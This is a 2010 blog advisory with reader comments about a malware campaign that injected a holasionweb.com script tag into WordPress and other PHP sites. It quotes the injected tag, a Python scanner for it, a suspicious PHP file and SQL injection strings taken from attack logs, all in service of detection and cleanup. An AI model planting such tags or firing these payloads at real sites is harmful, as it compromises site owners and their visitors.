Owners of self-hosted WordPress sites on GoDaddy.com are reporting today that their sites have been maliciously hacked with the injected code <script src="http://holasionweb.com/oo.php"></script>!
Warning: This is dangerous malware! Anyone visiting an infected website can get their computer infected if they do not have an up-to-date anti-virus program using the latest threat definitions. If you receive a message to download anything when visiting an infected site, do NOT click "yes" or "okay" to download.
If your website is infected, take it down for maintenance immediately. There are instructions on how to do so at this post.
We have also received reports that this affected not only WordPress installations but also Joomla and other PHP-based platforms.
Here are the holasionweb symptoms:
- Infected sites get redirected to a fake AV (scareware).
- Some home pages are not showing the virus, but when clicking on a post or page, you will see the redirect (below).
- Redirects to a blank page at www.1.realsafe-23.net/?......
- Source code reveals <script src="http://holasionweb.com/oo.php"> in the header section </head> of the infected pages.
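
As an added example (not part of the original post or of any tool it links to), the Python sketch below walks a document root and flags files that carry the injected script tag listed above, plus PHP files that open with base64-encoded code, as readers report in the comments. The eval(base64_decode( pattern, the 4 KiB window and the sample files are assumptions constructed for the demo.

```python
import os
import re
import tempfile

# Indicator from the page: the injected script source.
SCRIPT_IOC = re.compile(rb"<script[^>]*src=[^>]*holasionweb\.com/oo\.php", re.I)
# Assumed shape of the base64 block at the top (first 4 KiB) of PHP files.
B64_HEADER = re.compile(rb"<\?php\s*eval\s*\(\s*base64_decode\s*\(", re.I)
SCAN_EXT = (".php", ".html", ".htm", ".js")


def scan_file(path):
    """Return the findings for one file (empty list if clean)."""
    try:
        with open(path, "rb") as fh:
            data = fh.read()
    except OSError as exc:
        return [f"unreadable: {exc.strerror}"]
    findings = []
    if SCRIPT_IOC.search(data):
        findings.append("holasionweb script tag")
    if path.lower().endswith(".php") and B64_HEADER.search(data[:4096]):
        findings.append("base64 eval header")
    return findings


def scan_tree(root):
    """Map relative path -> findings for every flagged file under root."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            hits = scan_file(full) if name.lower().endswith(SCAN_EXT) else []
            if hits:
                report[os.path.relpath(full, root)] = hits
    return report


def demo():
    """Scan a constructed docroot: two infected samples and one clean file."""
    samples = {
        "index.php": b"<?php eval(base64_decode('Y29uc3RydWN0ZWQ=')); ?><?php echo 1;",
        "about.html": b'<head><script src="http://holasionweb.com/oo.php"></script></head>',
        "clean.php": b"<?php echo base64_decode('aGk='); ?>",
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(body)
        return scan_tree(root)
```

Call scan_tree() on the real document root; a clean result only means these two patterns were not found, so the password change and file review described in this post still apply.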

How to fix your hacked WordPress site on GoDaddy.com
- We have written up instructions on how to remove malware and restore your WordPress site here.
- David Dede, of Sucuri.net, has written more information about this malware and created a simple clean up solution here.
We have informed Go Daddy's Security Department. We will continuously add updates to this post as they become available.
UPDATE 5/12/2010 at 10:15am: We have heard from Go Daddy. They are aware of this current issue and will be providing us with information soon.
UPDATE 5/12/2010 at 10:30am: I would suggest that each of you infected with this virus have your website monitored. You can get web security reports in minutes. Here's our affiliate link: http://www.wpsecuritylock.com/sitesecuritymonitor
UPDATE 5/12/2010 at 12:00 pm: Here's a statement we just received from Go Daddy to share with you.
Bloggers,
We've identified and are working with the provider and hosting company from where the attacks are originating. With the help of the blogging community, we're close to breaking additional details related to recent malware attacks. Additional information will be provided to the other hosting providers involved in the same situation and the blogging community as available and as appropriate.
In the meantime, we've posted some perspective, additional information and quotable tidbits on the Go Daddy Blog: What's Up with Go Daddy, WordPress, PHP Exploits and Malware?
- Noah Plumb
Go Daddy Communications
UPDATE 5/11/2010 at 2:00pm: We are receiving reports that other hosting companies are infected with this malware. So it is spreading. Thank you for all your comments. We are doing our best to read and approve incoming comments, while we fix hacked websites.
VERY IMPORTANT!!! UPDATE 5/11/2010 at 5:20pm: Change your database password immediately. We are finding some sites that have mystery files that contain database information copied from the wp-config.php file.
Securely yours,
Regina Smola

There is a better, faster and easier solution to this holasionweb problem, just read it at tintation.com
Hi Vladimir,
Thanks for your comment. The script is great and fast. But... did you check your server to delete the trigger php file? This contains a different injected code that usually is found the day before it shoots into your php files.
Where do we look for this? I need to find it too I guess.
We have been finding it in the same directory that contains your wp-config.php file.
I found a VERY suspicious looking file (I deleted it) on my website named gdform.php. Here is the code it contained (it also had the base 64 encoded code identical to all the other php files at the top)
<?php
$request_method = $_SERVER["REQUEST_METHOD"];
if($request_method == "GET"){
    $query_vars = $_GET;
} elseif ($request_method == "POST"){
    $query_vars = $_POST;
}
reset($query_vars);
$t = date("U");
$file = $_SERVER['DOCUMENT_ROOT'] . "/../data/gdform_" . $t;
$fp = fopen($file,"w");
while (list ($key, $val) = each ($query_vars)) {
    fputs($fp,"\n");
    fputs($fp,"$val\n");
    fputs($fp,"\n");
    if ($key == "redirect") { $landing_page = $val;}
}
fclose($fp);
if ($landing_page != ""){
    header("Location: http://".$_SERVER["HTTP_HOST"]."/$landing_page");
} else {
    header("Location: http://".$_SERVER["HTTP_HOST"]."/");
}
?>
I wonder how they were able to place this file in my document root?
http://help.godaddy.com/article/510
The reason that file had the code on it is because the base64 code spreads to other php files.
I just had someone try and log in using the backend with an IP 188.72.213.44!
The webpage was my domain followed by /wp-content/plugins/wordspew/wordspew-rss.php?id=-998877+UNION+SELECT+0,1,0x6875616B,3,4,5--
and the Offending Parameter: id = -998877 UNION SELECT 0,1,0x6875616B,3,4,5--
I don't have the wordspew plugin.
He also tried using this plugin too
wp-content/plugins/wp-adserve/adclick.php?id=-1+union+select+0x6875616B
Thanks for fixing my blog!